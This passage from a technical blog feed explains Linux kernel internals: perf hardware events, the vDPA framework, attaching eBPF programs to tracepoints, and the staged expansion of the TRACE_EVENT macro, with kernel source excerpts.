end:
rcu_read_unlock();
}
</code></pre></div></div>
<p>As we can see, it finally calls ‘perf_swevent_event’ to trigger an event.</p>
<h3> hardware perf event </h3>
<p>One of the hardware PMU is defined as follows:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static struct pmu pmu = {
.pmu_enable = x86_pmu_enable,
.pmu_disable = x86_pmu_disable,
.attr_groups = x86_pmu_attr_groups,
.event_init = x86_pmu_event_init,
.event_mapped = x86_pmu_event_mapped,
.event_unmapped = x86_pmu_event_unmapped,
.add = x86_pmu_add,
.del = x86_pmu_del,
.start = x86_pmu_start,
.stop = x86_pmu_stop,
.read = x86_pmu_read,
.start_txn = x86_pmu_start_txn,
.cancel_txn = x86_pmu_cancel_txn,
.commit_txn = x86_pmu_commit_txn,
.event_idx = x86_pmu_event_idx,
.sched_task = x86_pmu_sched_task,
.task_ctx_size = sizeof(struct x86_perf_task_context),
.swap_task_ctx = x86_pmu_swap_task_ctx,
.check_period = x86_pmu_check_period,
.aux_output_match = x86_pmu_aux_output_match,
};
</code></pre></div></div>
<p>The hardware perf event is quite complicated as it interacts with the hardware. We will not go deep into the hardware here.</p>
<h4> perf event init </h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> x86_pmu_event_init
->__x86_pmu_event_init
->x86_reserve_hardware
->x86_pmu.hw_config()
->validate_event
</code></pre></div></div>
<p>The ‘x86_pmu’ here is an arch-specific PMU structure.</p>
<h4> perf event add </h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> x86_pmu_add
->collect_events
->x86_pmu.schedule_events()
->x86_pmu.add
</code></pre></div></div>
<p>‘collect_events’ sets</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> cpuc->event_list[n] = leader;
</code></pre></div></div>
<h4> perf event del </h4>
<p>x86_pmu_del will delete the event from ‘cpuc->event_list’.</p>
<h4> perf event trigger </h4>
<p>When the hardware event triggered, it will trigger a NMI interrupt. The handler for this is ‘perf_event_nmi_handler’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static int
perf_event_nmi_handler(unsigned int cmd, struct pt_regs *regs)
{
u64 start_clock;
u64 finish_clock;
int ret;
/*
* All PMUs/events that share this PMI handler should make sure to
* increment active_events for their events.
*/
if (!atomic_read(&active_events))
return NMI_DONE;
start_clock = sched_clock();
ret = x86_pmu.handle_irq(regs);
finish_clock = sched_clock();
perf_sample_event_took(finish_clock - start_clock);
return ret;
}
</code></pre></div></div>
<p>Take ‘x86_pmu.handle_irq’ (x86_pmu_handle_irq) as an example.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> for (idx = 0; idx < x86_pmu.num_counters; idx++) {
if (!test_bit(idx, cpuc->active_mask))
continue;
event = cpuc->events[idx];
val = x86_perf_event_update(event);
if (val & (1ULL << (x86_pmu.cntval_bits - 1)))
continue;
/*
* event overflow
*/
handled++;
perf_sample_data_init(&data, 0, event->hw.last_period);
if (!x86_perf_event_set_period(event))
continue;
if (perf_event_overflow(event, &data, regs))
x86_pmu_stop(event, 0);
}
</code></pre></div></div>
<p>Here we can see it iterates over ‘cpuc’ to find which event triggered this interrupt.</p>
vDPA kernel framework introduction2020-08-22T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2020/08/22/vdpa-analysis
<p>Virtual data path acceleration (vDPA) is a new technology to accelerate performance (like other hardware offloading). A vDPA device is a device whose datapath complies with the virtio spec but whose control path is vendor-specific.</p>
<p>A vDPA device can be implemented by a PF, VF, VDEV or SF device. In order to support vDPA devices and hide the complexity of the hardware, a vDPA kernel framework has been implemented. Following is the overview architecture, which is from <a href="https://www.redhat.com/en/blog/vdpa-kernel-framework-part-1-vdpa-bus-abstracting-hardware">vDPA Kernel Framework Part #1: vDPA Bus for Abstracting Hardware</a>.</p>
<p><img src="/assets/img/vdpa/1.png" alt="" /></p>
<p>The vDPA framework is used to abstract vDPA devices and present them as virtio devices to the vhost/virtio subsystems. There are three components in the vDPA framework.</p>
<h3> vDPA bus </h3>
<p>The code is in ‘drivers/vdpa/vdpa.c’. The vDPA bus holds the various vdpa bus drivers and vdpa devices.
Some of the exported functions:</p>
<ul>
<li>
<p>‘__vdpa_alloc_device’: called from the vDPA device driver, this allocates a vdpa device. The ‘vdpa_config_ops’ parameter specifies the vendor-specific operations, which include the virtqueue ops, device ops and dma ops.</p>
</li>
<li>
<p>‘vdpa_register_device’: register a vDPA device</p>
</li>
<li>
<p>‘__vdpa_register_driver’: register a vDPA bus driver</p>
</li>
</ul>
<p>The vDPA bus is registered at system startup.</p>
<h3> vDPA device driver </h3>
<p>A vDPA device driver communicates directly with the vDPA device through the vendor-specific method and presents an abstract vDPA device on the vDPA bus. There are currently two vDPA device drivers.</p>
<ul>
<li>ifcvf device driver: in drivers/vdpa/ifcvf directory. This is currently the only vDPA hardware device driver in upstream.</li>
<li>vdpa simulator: in drivers/vdpa/vdpa_sim directory. This is just a vDPA simulator device driver.</li>
</ul>
<p>In the driver’s probe function, it calls ‘vdpa_register_device’ to register a vDPA device.</p>
<h3> vDPA bus driver </h3>
<p>vDPA bus driver is used to connect the vDPA bus to vhost and virtio subsystem. There are two types of vDPA bus drivers.</p>
<ul>
<li>
<p>vhost vdpa bus driver: the code is in ‘drivers/vhost/vdpa.c’. This driver connects the vDPA bus to the vhost subsystem and exports a vhost char device to userspace. Userspace can then use this vhost device to bypass the host kernel.</p>
</li>
<li>
<p>virtio vdpa bus driver: the code is in ‘drivers/virtio/virtio_vdpa.c’. This driver abstracts the vDPA device as a virtio device and creates a virtio device on the virtio bus.</p>
</li>
</ul>
<p>Following shows the data structure relations.</p>
<p><img src="/assets/img/vdpa/2.png" alt="" /></p>
How eBPF program connects with tracepoint2020-08-09T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2020/08/09/ebpf-with-tracepoint
<p>In the last post <a href="https://terenceli.github.io/%E6%8A%80%E6%9C%AF/2020/08/08/trace-event-framework">Linux tracing - trace event framework</a> I discussed the internals of trace events. Now it’s time to look at how a trace event connects with an eBPF program.</p>
<h3> trace event under perf </h3>
<p>When the perf subsystem is enabled, ‘TRACE_EVENT’ will be defined as follows.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> include/trace/perf.h
#undef DECLARE_EVENT_CLASS
#define DECLARE_EVENT_CLASS(call, proto, args, tstruct, assign, print) \
static notrace void \
perf_trace_##call(void *__data, proto) \
{ \
struct trace_event_call *event_call = __data; \
struct trace_event_data_offsets_##call __maybe_unused __data_offsets;\
struct trace_event_raw_##call *entry; \
struct pt_regs *__regs; \
u64 __count = 1; \
struct task_struct *__task = NULL; \
struct hlist_head *head; \
int __entry_size; \
int __data_size; \
int rctx; \
\
__data_size = trace_event_get_offsets_##call(&__data_offsets, args); \
\
head = this_cpu_ptr(event_call->perf_events); \
if (!bpf_prog_array_valid(event_call) && \
__builtin_constant_p(!__task) && !__task && \
hlist_empty(head)) \
return; \
\
__entry_size = ALIGN(__data_size + sizeof(*entry) + sizeof(u32),\
sizeof(u64)); \
__entry_size -= sizeof(u32); \
\
entry = perf_trace_buf_alloc(__entry_size, &__regs, &rctx); \
if (!entry) \
return; \
\
perf_fetch_caller_regs(__regs); \
\
tstruct \
\
{ assign; } \
\
perf_trace_run_bpf_submit(entry, __entry_size, rctx, \
event_call, __count, __regs, \
head, __task); \
}
</code></pre></div></div>
<p>This is very similar to ‘trace_event_class’’s probe function ‘trace_event_raw_event_##call’. In fact, ‘trace_event_class’ has a ‘perf_probe’ callback, and it is assigned ‘perf_trace_##call’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> include/trace/trace_events.h
#ifdef CONFIG_PERF_EVENTS
#define _TRACE_PERF_PROTO(call, proto) \
static notrace void \
perf_trace_##call(void *__data, proto);
#define _TRACE_PERF_INIT(call) \
.perf_probe = perf_trace_##call,
static struct trace_event_class __used __refdata event_class_##call = { \
.system = TRACE_SYSTEM_STRING, \
.define_fields = trace_event_define_fields_##call, \
.fields = LIST_HEAD_INIT(event_class_##call.fields),\
.raw_init = trace_event_raw_init, \
.probe = trace_event_raw_event_##call, \
.reg = trace_event_reg, \
_TRACE_PERF_INIT(call) \
};
</code></pre></div></div>
<p>When userspace calls the ‘perf_event_open’ syscall and specifies a tracepoint to monitor, it will call the ‘tp_event->class->reg’ callback with ‘TRACE_REG_PERF_REGISTER’. This callback (trace_event_reg) calls ‘tracepoint_probe_register’ with ‘call->class->perf_probe’ to add ‘perf_trace_##call’ to the tracepoint’s funcs member.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> kernel/trace/trace_event_perf.c:perf_trace_event_reg
tp_event->class->reg(tp_event, TRACE_REG_PERF_REGISTER, NULL);
kernel/trace/trace_events.c
int trace_event_reg(struct trace_event_call *call,
enum trace_reg type, void *data)
{
struct trace_event_file *file = data;
WARN_ON(!(call->flags & TRACE_EVENT_FL_TRACEPOINT));
switch (type) {
case TRACE_REG_REGISTER:
return tracepoint_probe_register(call->tp,
call->class->probe,
file);
case TRACE_REG_UNREGISTER:
tracepoint_probe_unregister(call->tp,
call->class->probe,
file);
return 0;
#ifdef CONFIG_PERF_EVENTS
case TRACE_REG_PERF_REGISTER:
return tracepoint_probe_register(call->tp,
call->class->perf_probe,
call);
case TRACE_REG_PERF_UNREGISTER:
tracepoint_probe_unregister(call->tp,
call->class->perf_probe,
call);
return 0;
case TRACE_REG_PERF_OPEN:
case TRACE_REG_PERF_CLOSE:
case TRACE_REG_PERF_ADD:
case TRACE_REG_PERF_DEL:
return 0;
#endif
}
return 0;
}
</code></pre></div></div>
<p>When ‘trace_xxx_xxx’ is called, the tracepoint’s funcs will be invoked, so ‘perf_trace_##call’ runs. In ‘perf_trace_##call’, the perf subsystem allocates a buffer and calls ‘perf_trace_run_bpf_submit’ to commit it, which in turn calls ‘trace_call_bpf’ to run the eBPF programs.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> void perf_trace_run_bpf_submit(void *raw_data, int size, int rctx,
struct trace_event_call *call, u64 count,
struct pt_regs *regs, struct hlist_head *head,
struct task_struct *task)
{
if (bpf_prog_array_valid(call)) {
*(struct pt_regs **)raw_data = regs;
if (!trace_call_bpf(call, raw_data) || hlist_empty(head)) {
perf_swevent_put_recursion_context(rctx);
return;
}
}
perf_tp_event(call->event.type, count, raw_data, size, regs, head,
rctx, task);
}
</code></pre></div></div>
<h3> Connect eBPF program with tracepoint </h3>
<p>When the userspace calls ‘ioctl(PERF_EVENT_IOC_SET_BPF)’, ‘perf_event_set_bpf_prog’ will be used to handle this request. ‘perf_event_attach_bpf_prog’ then called.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> int perf_event_attach_bpf_prog(struct perf_event *event,
struct bpf_prog *prog)
{
struct bpf_prog_array __rcu *old_array;
struct bpf_prog_array *new_array;
int ret = -EEXIST;
mutex_lock(&bpf_event_mutex);
if (event->prog)
goto unlock;
old_array = event->tp_event->prog_array;
if (old_array &&
bpf_prog_array_length(old_array) >= BPF_TRACE_MAX_PROGS) {
ret = -E2BIG;
goto unlock;
}
ret = bpf_prog_array_copy(old_array, NULL, prog, &new_array);
if (ret < 0)
goto unlock;
/* set the new array to event->tp_event and set event->prog */
event->prog = prog;
rcu_assign_pointer(event->tp_event->prog_array, new_array);
bpf_prog_array_free(old_array);
unlock:
mutex_unlock(&bpf_event_mutex);
return ret;
}
</code></pre></div></div>
<p>This is quite trivial: it just adds the eBPF program to ‘event->tp_event->prog_array’. Here ‘tp_event’ is a ‘struct trace_event_call’.</p>
<p>When ‘perf_trace_run_bpf_submit’ calls ‘trace_call_bpf’, this eBPF program will be run. The ‘*(struct pt_regs **)raw_data = regs;’ line looks strange;
this commit <a href="https://github.com/torvalds/linux/commit/98b5c2c65c2951772a8fc661f50d675e450e8bce">perf, bpf: allow bpf programs attach to tracepoints</a> explains what it is for. We should also notice that if ‘trace_call_bpf’ returns a non-zero value, the original ‘perf_tp_event’ will be called and the event data will be copied to the perf subsystem buffer.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> kernel/trace/bpf_trace.c
unsigned int trace_call_bpf(struct trace_event_call *call, void *ctx)
{
unsigned int ret;
if (in_nmi()) /* not supported yet */
return 1;
preempt_disable();
...
ret = BPF_PROG_RUN_ARRAY_CHECK(call->prog_array, ctx, BPF_PROG_RUN);
out:
__this_cpu_dec(bpf_prog_active);
preempt_enable();
return ret;
}
include/linux/bpf.h
#define __BPF_PROG_RUN_ARRAY(array, ctx, func, check_non_null) \
({ \
struct bpf_prog **_prog, *__prog; \
struct bpf_prog_array *_array; \
u32 _ret = 1; \
rcu_read_lock(); \
_array = rcu_dereference(array); \
if (unlikely(check_non_null && !_array))\
goto _out; \
_prog = _array->progs; \
while ((__prog = READ_ONCE(*_prog))) { \
_ret &= func(__prog, ctx); \
_prog++; \
} \
_out: \
rcu_read_unlock(); \
_ret; \
})
#define BPF_PROG_RUN_ARRAY(array, ctx, func) \
__BPF_PROG_RUN_ARRAY(array, ctx, func, false)
#define BPF_PROG_RUN_ARRAY_CHECK(array, ctx, func) \
__BPF_PROG_RUN_ARRAY(array, ctx, func, true)
</code></pre></div></div>
Linux tracing - trace event framework2020-08-08T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2020/08/08/trace-event-framework
<h3> Sample </h3>
<p>This post will show the trace event framework. The most important parts are the ‘TRACE_EVENT’ expansion and the connection between tracepoints and the ftrace tracer. As usual we will start our discussion with an example. This example is from <a href="https://lwn.net/Articles/383362/">Using the TRACE_EVENT() macro (Part 3)</a>. There are three files: <a href="/assets/file/trace/sillymod.c">sillymod.c</a>, <a href="/assets/file/trace/silly-trace.h">silly-trace.h</a>, <a href="/assets/file/trace/Makefile">Makefile</a>.</p>
<p>Then we insmod the module and see the trace print out.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu:~/silly# insmod ./sillymod.ko
root@ubuntu:~/silly# cd /sys/kernel/debug/tracing/
root@ubuntu:/sys/kernel/debug/tracing# ls events/silly/
enable filter me_silly
root@ubuntu:/sys/kernel/debug/tracing# echo 1 > events/silly/enable
root@ubuntu:/sys/kernel/debug/tracing# cat trace
# tracer: nop
#
# entries-in-buffer/entries-written: 6/6 #P:8
#
# _-----=> irqs-off
# / _----=> need-resched
# | / _---=> hardirq/softirq
# || / _--=> preempt-depth
# ||| / delay
# TASK-PID CPU# |||| TIMESTAMP FUNCTION
# | | | |||| | |
silly-thread-30460 [001] .... 178964.333898: me_silly: time=4339634000 count=22
silly-thread-30460 [001] .... 178965.358104: me_silly: time=4339634256 count=23
silly-thread-30460 [001] .... 178966.382349: me_silly: time=4339634512 count=24
silly-thread-30460 [001] .... 178967.405770: me_silly: time=4339634768 count=25
silly-thread-30460 [001] .... 178968.430004: me_silly: time=4339635024 count=26
silly-thread-30460 [001] .... 178969.453728: me_silly: time=4339635280 count=27
</code></pre></div></div>
<p>So most of the work we do ourselves is writing the ‘TRACE_EVENT’ macro; after that we can use the ‘trace_me_silly’ function.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> TRACE_EVENT(me_silly,
TP_PROTO(unsigned long time, unsigned long count),
TP_ARGS(time, count),
TP_STRUCT__entry(
__field( unsigned long, time )
__field( unsigned long, count )
),
TP_fast_assign(
__entry->time = jiffies;
__entry->count = count;
),
TP_printk("time=%lu count=%lu", __entry->time, __entry->count)
);
</code></pre></div></div>
<p>We will now look at how this macro expands.</p>
<h3> MACRO magic</h3>
<p>Before we go into the details of how ‘TRACE_EVENT’ works, let’s look at a small example, also from the LWN posts.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #define DOGS { C(JACK_RUSSELL), C(BULL_TERRIER), C(ITALIAN_GREYHOUND) }
#undef C
#define C(a) ENUM_##a
enum dog_enums DOGS;
#undef C
#define C(a) #a
char *dog_strings[] = DOGS;
char *dog_to_string(enum dog_enums dog)
{
return dog_strings[dog];
}
</code></pre></div></div>
<p>The magic here is that we define the ‘C’ macro twice and change the behavior of the ‘DOGS’ macro.</p>
<p>The first definition of ‘C’ will make ‘DOGS’ as an enum. So we have this:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> enum dog_enums {ENUM_JACK_RUSSELL, ENUM_BULL_TERRIER, ENUM_ITALIAN_GREYHOUND};
</code></pre></div></div>
<p>The second definition of ‘C’ will make ‘DOGS’ as string array:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> char *dog_strings = {"JACK_RUSSELL", "BULL_TERRIER", "ITALIAN_GREYHOUND"};
</code></pre></div></div>
<p>The ‘dog_to_string’ will return a string using the enum as index.</p>
<p>The key idea here is that we can generate different code from the same information. This is why we get full tracing support just by defining a single ‘TRACE_EVENT’ macro.</p>
<h3> TRACE_EVENT MACRO</h3>
<p>In the final part of my last post <a href="https://terenceli.github.io/%E6%8A%80%E6%9C%AF/2020/08/05/tracing-basic">Linux tracing - kprobe, uprobe and tracepoint</a>, I discussed how a ‘tracepoint’ is declared and defined.
Now it’s time to see how it integrates with ftrace.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #undef TRACE_SYSTEM
#define TRACE_SYSTEM silly
#if !defined(_SILLY_TRACE_H) || defined(TRACE_HEADER_MULTI_READ)
#define _SILLY_TRACE_H
#include <linux/tracepoint.h>
TRACE_EVENT(me_silly,
TP_PROTO(unsigned long time, unsigned long count),
TP_ARGS(time, count),
TP_STRUCT__entry(
__field( unsigned long, time )
__field( unsigned long, count )
),
TP_fast_assign(
__entry->time = jiffies;
__entry->count = count;
),
TP_printk("time=%lu count=%lu", __entry->time, __entry->count)
);
#endif /* _SILLY_TRACE_H */
/* This part must be outside protection */
#undef TRACE_INCLUDE_PATH
#define TRACE_INCLUDE_PATH .
#define TRACE_INCLUDE_FILE silly-trace
#include <trace/define_trace.h>
</code></pre></div></div>
<p>First, the ‘defined(TRACE_HEADER_MULTI_READ)’ guard allows this file to be included several times.</p>
<h4> First definition of 'TRACE_EVENT' </h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> linux/tracepoint.h
#define TRACE_EVENT(name, proto, args, struct, assign, print) \
DECLARE_TRACE(name, PARAMS(proto), PARAMS(args))
</code></pre></div></div>
<p>Here ‘DECLARE_TRACE’ declares a tracepoint.</p>
<h4> Second definition of 'TRACE_EVENT' </h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> trace/define_trace.h
#undef TRACE_EVENT
#define TRACE_EVENT(name, proto, args, tstruct, assign, print) \
DEFINE_TRACE(name)
</code></pre></div></div>
<p>Here ‘DEFINE_TRACE’ defines a tracepoint.</p>
<p>‘DECLARE_TRACE’ and ‘DEFINE_TRACE’ were discussed in my last post. These two macros define a ‘struct tracepoint’ and several functions, and all of the ‘tracepoint’ structures are stored in the ‘__tracepoints’ section.</p>
<h4> Third definition of 'TRACE_EVENT' </h4>
<p>In trace/define_trace.h we will include trace/trace_events.h header file.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> trace/define_trace.h
#include <trace/trace_events.h>
</code></pre></div></div>
<p>At the beginning of this header file we find the ‘TRACE_EVENT’ definition as follows.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> trace/trace_events.h
#define TRACE_EVENT(name, proto, args, tstruct, assign, print) \
DECLARE_EVENT_CLASS(name, \
PARAMS(proto), \
PARAMS(args), \
PARAMS(tstruct), \
PARAMS(assign), \
PARAMS(print)); \
DEFINE_EVENT(name, name, PARAMS(proto), PARAMS(args));
</code></pre></div></div>
<p>In this header file, the sub-macros ‘DECLARE_EVENT_CLASS’ and ‘DEFINE_EVENT’ are defined several times, which means ‘TRACE_EVENT’ effectively gets several more definitions.</p>
<p>Let’s look at the first definition in this file (the third in total).</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #undef __field
#define __field(type, item) type item;
#undef __field_ext
#define __field_ext(type, item, filter_type) type item;
#undef __field_struct
#define __field_struct(type, item) type item;
#undef __field_struct_ext
#define __field_struct_ext(type, item, filter_type) type item;
#undef __array
#define __array(type, item, len) type item[len];
#undef __dynamic_array
#define __dynamic_array(type, item, len) u32 __data_loc_##item;
#undef __string
#define __string(item, src) __dynamic_array(char, item, -1)
#undef __bitmask
#define __bitmask(item, nr_bits) __dynamic_array(char, item, -1)
#undef TP_STRUCT__entry
#define TP_STRUCT__entry(args...) args
#undef DECLARE_EVENT_CLASS
#define DECLARE_EVENT_CLASS(name, proto, args, tstruct, assign, print) \
struct trace_event_raw_##name { \
struct trace_entry ent; \
tstruct \
char __data[0]; \
}; \
\
static struct trace_event_class event_class_##name;
#undef DEFINE_EVENT
#define DEFINE_EVENT(template, name, proto, args) \
static struct trace_event_call __used \
__attribute__((__aligned__(4))) event_##name
</code></pre></div></div>
<p>‘DECLARE_EVENT_CLASS’ defines a ‘struct trace_event_raw_##name’, and all of the data the tracer wants to record is defined in this struct. A data entry can be dynamic; the information about the dynamic data is stored in ‘__data_loc_##item’ and the real data is stored in ‘__data[0]’.</p>
<h4> Fourth definition of 'TRACE_EVENT' </h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #undef __field
#define __field(type, item)
#undef __field_ext
#define __field_ext(type, item, filter_type)
#undef __field_struct
#define __field_struct(type, item)
#undef __field_struct_ext
#define __field_struct_ext(type, item, filter_type)
#undef __array
#define __array(type, item, len)
#undef __dynamic_array
#define __dynamic_array(type, item, len) u32 item;
#undef __string
#define __string(item, src) __dynamic_array(char, item, -1)
#undef __bitmask
#define __bitmask(item, nr_bits) __dynamic_array(unsigned long, item, -1)
#undef DECLARE_EVENT_CLASS
#define DECLARE_EVENT_CLASS(call, proto, args, tstruct, assign, print) \
struct trace_event_data_offsets_##call { \
tstruct; \
};
#undef DEFINE_EVENT
#define DEFINE_EVENT(template, name, proto, args)
</code></pre></div></div>
<p>This round is quite easy: it just defines a ‘struct trace_event_data_offsets_##call’, which stores the dynamic data’s offsets.</p>
<h4> Fifth definition of 'TRACE_EVENT' </h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #undef __entry
#define __entry field
#undef TP_printk
#define TP_printk(fmt, args...) fmt "\n", args
#undef __get_dynamic_array
#define __get_dynamic_array(field) \
((void *)__entry + (__entry->__data_loc_##field & 0xffff))
#undef __get_dynamic_array_len
#define __get_dynamic_array_len(field) \
((__entry->__data_loc_##field >> 16) & 0xffff)
#undef __get_str
#define __get_str(field) ((char *)__get_dynamic_array(field))
#undef __get_bitmask
#define __get_bitmask(field) \
({ \
void *__bitmask = __get_dynamic_array(field); \
unsigned int __bitmask_size; \
__bitmask_size = __get_dynamic_array_len(field); \
trace_print_bitmask_seq(p, __bitmask, __bitmask_size); \
})
#undef __print_flags
#define __print_flags(flag, delim, flag_array...) \
({ \
static const struct trace_print_flags __flags[] = \
{ flag_array, { -1, NULL }}; \
trace_print_flags_seq(p, delim, flag, __flags); \
})
#undef __print_symbolic
#define __print_symbolic(value, symbol_array...) \
({ \
static const struct trace_print_flags symbols[] = \
{ symbol_array, { -1, NULL }}; \
trace_print_symbols_seq(p, value, symbols); \
})
#undef __print_flags_u64
#undef __print_symbolic_u64
#if BITS_PER_LONG == 32
#define __print_flags_u64(flag, delim, flag_array...) \
({ \
static const struct trace_print_flags_u64 __flags[] = \
{ flag_array, { -1, NULL } }; \
trace_print_flags_seq_u64(p, delim, flag, __flags); \
})
#define __print_symbolic_u64(value, symbol_array...) \
({ \
static const struct trace_print_flags_u64 symbols[] = \
{ symbol_array, { -1, NULL } }; \
trace_print_symbols_seq_u64(p, value, symbols); \
})
#else
#define __print_flags_u64(flag, delim, flag_array...) \
__print_flags(flag, delim, flag_array)
#define __print_symbolic_u64(value, symbol_array...) \
__print_symbolic(value, symbol_array)
#endif
#undef __print_hex
#define __print_hex(buf, buf_len) \
trace_print_hex_seq(p, buf, buf_len, false)
#undef __print_hex_str
#define __print_hex_str(buf, buf_len) \
trace_print_hex_seq(p, buf, buf_len, true)
#undef __print_array
#define __print_array(array, count, el_size) \
({ \
BUILD_BUG_ON(el_size != 1 && el_size != 2 && \
el_size != 4 && el_size != 8); \
trace_print_array_seq(p, array, count, el_size); \
})
#undef DECLARE_EVENT_CLASS
#define DECLARE_EVENT_CLASS(call, proto, args, tstruct, assign, print) \
static notrace enum print_line_t \
trace_raw_output_##call(struct trace_iterator *iter, int flags, \
struct trace_event *trace_event) \
{ \
struct trace_seq *s = &iter->seq; \
struct trace_seq __maybe_unused *p = &iter->tmp_seq; \
struct trace_event_raw_##call *field; \
int ret; \
\
field = (typeof(field))iter->ent; \
\
ret = trace_raw_output_prep(iter, trace_event); \
if (ret != TRACE_TYPE_HANDLED) \
return ret; \
\
trace_seq_printf(s, print); \
\
return trace_handle_return(s); \
} \
static struct trace_event_functions trace_event_type_funcs_##call = { \
.trace = trace_raw_output_##call, \
};
</code></pre></div></div>
<p>Here a ‘trace_raw_output_##call’ function is defined; it is used to print the raw event data (in the ring buffer) to the tracer’s output buffer. The raw data is stored in ‘iter->ent’. A ‘struct trace_event_functions’ named ‘trace_event_type_funcs_##call’ is also defined. This round also processes the special ‘print’ helpers such as ‘__print_flags’.</p>
<h4> Sixth definition of 'TRACE_EVENT' </h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #undef __field_ext
#define __field_ext(type, item, filter_type) \
ret = trace_define_field(event_call, #type, #item, \
offsetof(typeof(field), item), \
sizeof(field.item), \
is_signed_type(type), filter_type); \
if (ret) \
return ret;
#undef __field_struct_ext
#define __field_struct_ext(type, item, filter_type) \
ret = trace_define_field(event_call, #type, #item, \
offsetof(typeof(field), item), \
sizeof(field.item), \
0, filter_type); \
if (ret) \
return ret;
#undef __field
#define __field(type, item) __field_ext(type, item, FILTER_OTHER)
#undef __field_struct
#define __field_struct(type, item) __field_struct_ext(type, item, FILTER_OTHER)
#undef __array
#define __array(type, item, len) \
do { \
char *type_str = #type"["__stringify(len)"]"; \
BUILD_BUG_ON(len > MAX_FILTER_STR_VAL); \
ret = trace_define_field(event_call, type_str, #item, \
offsetof(typeof(field), item), \
sizeof(field.item), \
is_signed_type(type), FILTER_OTHER); \
if (ret) \
return ret; \
} while (0);
#undef __dynamic_array
#define __dynamic_array(type, item, len) \
ret = trace_define_field(event_call, "__data_loc " #type "[]", #item, \
offsetof(typeof(field), __data_loc_##item), \
sizeof(field.__data_loc_##item), \
is_signed_type(type), FILTER_OTHER);
#undef __string
#define __string(item, src) __dynamic_array(char, item, -1)
#undef __bitmask
#define __bitmask(item, nr_bits) __dynamic_array(unsigned long, item, -1)
#undef DECLARE_EVENT_CLASS
#define DECLARE_EVENT_CLASS(call, proto, args, tstruct, func, print) \
static int notrace __init \
trace_event_define_fields_##call(struct trace_event_call *event_call) \
{ \
struct trace_event_raw_##call field; \
int ret; \
\
tstruct; \
\
return ret; \
}
</code></pre></div></div>
<p>Here we define the function ‘trace_event_define_fields_##call’. This function calls ‘trace_define_field’ for every member in ‘TP_STRUCT__entry’. ‘trace_define_field’ inserts the field information into the ‘event_call->class->fields’ linked list, which is used by the ftrace framework.</p>
<h4> Seventh definition of 'TRACE_EVENT' </h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #undef __entry
#define __entry entry
#undef __field
#define __field(type, item)
#undef __field_ext
#define __field_ext(type, item, filter_type)
#undef __field_struct
#define __field_struct(type, item)
#undef __field_struct_ext
#define __field_struct_ext(type, item, filter_type)
#undef __array
#define __array(type, item, len)
#undef __dynamic_array
#define __dynamic_array(type, item, len) \
__item_length = (len) * sizeof(type); \
__data_offsets->item = __data_size + \
offsetof(typeof(*entry), __data); \
__data_offsets->item |= __item_length << 16; \
__data_size += __item_length;
#undef __string
#define __string(item, src) __dynamic_array(char, item, \
strlen((src) ? (const char *)(src) : "(null)") + 1)
/*
* __bitmask_size_in_bytes_raw is the number of bytes needed to hold
* num_possible_cpus().
*/
#define __bitmask_size_in_bytes_raw(nr_bits) \
(((nr_bits) + 7) / 8)
#define __bitmask_size_in_longs(nr_bits) \
((__bitmask_size_in_bytes_raw(nr_bits) + \
((BITS_PER_LONG / 8) - 1)) / (BITS_PER_LONG / 8))
/*
* __bitmask_size_in_bytes is the number of bytes needed to hold
* num_possible_cpus() padded out to the nearest long. This is what
* is saved in the buffer, just to be consistent.
*/
#define __bitmask_size_in_bytes(nr_bits) \
(__bitmask_size_in_longs(nr_bits) * (BITS_PER_LONG / 8))
#undef __bitmask
#define __bitmask(item, nr_bits) __dynamic_array(unsigned long, item, \
__bitmask_size_in_longs(nr_bits))
#undef DECLARE_EVENT_CLASS
#define DECLARE_EVENT_CLASS(call, proto, args, tstruct, assign, print) \
static inline notrace int trace_event_get_offsets_##call( \
struct trace_event_data_offsets_##call *__data_offsets, proto) \
{ \
int __data_size = 0; \
int __maybe_unused __item_length; \
struct trace_event_raw_##call __maybe_unused *entry; \
\
tstruct; \
\
return __data_size; \
}
</code></pre></div></div>
<p>This time we define a function ‘trace_event_get_offsets_##call’, which is used to calculate the length and offset of every dynamic member in ‘TP_STRUCT__entry’. The result is stored in ‘struct trace_event_data_offsets_##call’, which was defined in the fourth-round expansion.</p>
<h4> Eighth definition of 'TRACE_EVENT' </h4>
